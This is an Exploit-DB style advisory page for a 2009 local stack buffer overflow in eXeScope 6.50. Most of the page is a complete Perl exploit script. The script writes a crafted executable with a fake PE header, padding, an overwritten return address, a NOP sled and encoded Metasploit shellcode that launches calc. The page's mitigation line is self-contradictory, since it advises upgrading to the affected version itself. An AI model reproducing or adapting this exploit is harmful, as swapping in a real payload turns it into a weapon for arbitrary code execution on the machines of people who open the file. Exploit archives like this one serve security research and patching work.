eXeScope 6.50 Local Buffer Overflow Exploit

vendor:

eXeScope

by:

Koshi

9.3

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: eXeScope

Affected Version From: 6.5

Affected Version To: 6.5

Patch Exists: YES

Related CWE: N/A

CPE: a:hp:exescope:6.50

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2009

eXeScope 6.50 Local Buffer Overflow Exploit

eXeScope 6.50 is vulnerable to a local buffer overflow vulnerability. The vulnerability is caused due to a boundary error when handling a specially crafted executable file. This can be exploited to cause a stack-based buffer overflow by eXeScope 6.50 when opening a malicious executable file. Successful exploitation could result in arbitrary code execution.

Mitigation:

Upgrade to the latest version of eXeScope 6.50 or apply the appropriate patch.

Source

Exploit-DB raw data:

#!/usr/bin/perl
#
# eXeScope 6.50 Local Buffer Overflow Exploit
#
# Download eXeScope 6.50 at:
# http://hp.vector.co.jp/authors/VA003525/eXeSc650.zip
#
# Exploit by: Koshi ( heykoshi@gmail.com )
# 

use strict;
use warnings;

my $headers = 
	"\x4D\x5A\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xFF\xFF\x00\x00".
	"\xB8\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00".
	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xB8\x00\x00\x00".
	"\x0E\x1F\xBA\x0E\x00\xB4\x09\xCD\x21\xB8\x01\x4C\xCD\x21\x54\x68".
	"\x69\x73\x20\x70\x72\x6F\x67\x72\x61\x6D\x20\x63\x61\x6E\x6E\x6F".
	"\x74\x20\x62\x65\x20\x72\x75\x6E\x20\x65\x69\x74\x68\x65\x72\x20".
	"\x77\x61\x79\x21\x21\x0D\x0D\x0A\x24\x00\x00\x00\x00\x00\x00\x00".
	"\x8F\x8A\xF9\xDB\xCB\xEB\x97\x88\xCB\xEB\x97\x88\xCB\xEB\x97\x88".
	"\x48\xF7\x99\x88\xCA\xEB\x97\x88\xA2\xF4\x9E\x88\xCA\xEB\x97\x88".
	"\x22\xF4\x9A\x88\xCA\xEB\x97\x88\x52\x69\x63\x68\xCB\xEB\x97\x88".
	"\x00\x00\x00\x00\x00\x00\x00\x00\x50\x45\x00\x00\x4C\x01\xFF\x00".
	"\xAB\xBA\x5C\x49\x00\x00\x00\x00\x00\x00\x00\x00\xE0\x00\xF0\x01".
	"\x00"x224;


# win32_exec -  EXITFUNC=process CMD=calc Size=161 Encoder=ShikataGaNai http://metasploit.com
my $shellcode =
	"\xb8\x82\x0a\x8d\x38\xd9\xc6\xd9\x74\x24\xf4\x5a\x29\xc9\xb1\x23".
	"\x31\x42\x12\x83\xea\xfc\x03\xc0\x04\x6f\xcd\x38\xf0\x2b\x2e\xc0".
	"\x01\x3f\x6b\xfc\x8a\x43\x71\x84\x8d\x54\xf2\x3b\x96\x21\x5a\xe3".
	"\xa7\xde\x2c\x68\x93\xab\xae\x80\xed\x6b\x29\xf0\x8a\xac\x3e\x0f".
	"\x52\xe6\xb2\x0e\x96\x1c\x38\x2b\x42\xc7\xc5\x3e\x8f\x8c\x99\xe4".
	"\x4e\x78\x43\x6f\x5c\x35\x07\x30\x41\xc8\xfc\x45\x65\x41\x03\xb2".
	"\x1f\x09\x20\x40\xe3\x83\xe8\x2c\x68\xa3\xd8\x29\xae\x5c\x15\xba".
	"\x6f\x91\xae\xcc\x73\x04\x3b\x44\x84\xbd\x35\x1f\x14\xf1\x46\x1f".
	"\x15\x79\x2e\x23\x4a\x4c\x59\x3b\x22\x27\x5d\x38\x0a\x4c\xce\x56".
	"\xf5\x6b\x0c\xd5\x61\x14\x2f\x93\x7c\x73\x2f\x44\xe3\x1a\xa3\xe9".
	"\xe4";

my $buff0 = "A"x4148;
my $eip   = "\x58\x32\x4D\x00"; # 004d3258 - eXeScope.exe
my $sled  = "\x90"x20;
my $len   = 6028 - length($shellcode);
my $buff1 = "A"x$len;
my $datas = $headers.$buff0.$eip.$sled.$shellcode.$buff1;

open(my $files, "> example.exe");
binmode $files;
print $files $datas;
close($files);

# milw0rm.com [2009-03-23]